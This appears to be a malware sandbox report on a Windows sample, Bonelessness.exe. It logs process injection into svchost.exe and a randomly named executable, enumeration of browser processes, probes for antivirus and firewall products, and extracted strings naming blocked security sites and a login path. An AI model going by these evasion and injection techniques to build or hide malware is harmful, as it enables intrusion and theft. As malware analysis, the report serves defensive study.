Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2901000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2902000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2954000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 23E0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 23E1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 23E2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2434000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E04000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D20000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D21000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D22000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D74000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1560000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1561000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1562000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 15B4000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 31E0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 31E1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 31E2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 3234000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 31E0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 31E1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 31E2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Windows\apppatch\svchost.exe base: 3234000	Jump to behavior

Source: C:\Windows\apppatch\svchost.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	1_2_02D37300
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	5_2_028A7300
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	6_2_02457300
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	8_2_012F7300

Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6216 -ip 6216	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6260 -ip 6260	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 800	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 732	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3496 -ip 3496	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 748	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 7140 -ip 7140	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 760	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7124 -ip 7124	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7088 -ip 7088	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7064 -ip 7064	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7040 -ip 7040	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7024 -ip 7024	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 7008 -ip 7008	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6988 -ip 6988	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6968 -ip 6968	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 6944 -ip 6944	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6920 -ip 6920	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6896 -ip 6896	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6988 -ip 6988	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7088 -ip 7088	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 7140 -ip 7140	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7124 -ip 7124	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\Bonelessness.exe	File opened: CA HIPS KmxAgent	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	File opened: Agnitum Outpost firewal \pipe\acsipc_server	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Window found: AVP NULL ____AVP.Root	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened: CA HIPS KmxAgent	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened: Agnitum Outpost firewal \pipe\acsipc_server	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Window found: AVP NULL ____AVP.Root	Jump to behavior

Source: Bonelessness.exe, Bonelessness.exe, 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp, Bonelessness.exe, 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: JbrLYfXaOpqnSngA.exe, 00000005.00000000.2010287647.0000000001481000.00000002.00000001.00040000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000006.00000000.2011041411.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000008.00000000.2012886710.0000000001711000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: Bonelessness.exe, 00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp, Bonelessness.exe, 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, svchost.exe, 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comkltest.org.rutrendsecureanti-malware.comodo.comavast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comkltest.org.rutrendsecureanti-malware.comodo.comgoogle.comgoogle.comDnsapi.dllDnsQuery_ADnsQuery_UTF8DnsQuery_WQuery_Mainws2_32.dllgetaddrinfogethostbynameinet_addrqwrtpsdfghjklzxcvbnmeyuioa1676d5775e05c50b46baa5579d4fc7;%s%s!verifMozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)/login.php6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9100016d3ad29879a90b4dd1b4f76e82166ca3T2data.txt\....\ntdll.dllZwQuerySystemInformationGlobal\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}fuckGlobal\HighMemoryEvent_%08xexplorer.exeShell_TrayWnd
Source: JbrLYfXaOpqnSngA.exe, 00000005.00000000.2010287647.0000000001481000.00000002.00000001.00040000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000006.00000000.2011041411.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000008.00000000.2012886710.0000000001711000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: JbrLYfXaOpqnSngA.exe, 00000005.00000000.2010287647.0000000001481000.00000002.00000001.00040000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000006.00000000.2011041411.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000008.00000000.2012886710.0000000001711000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\Bonelessness.exe

Code function: 0_2_00413DA0 cpuid

0_2_00413DA0

Source: C:\Windows\apppatch\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\Desktop\Bonelessness.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bonelessness.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Queries volume information: C:\ VolumeInformation
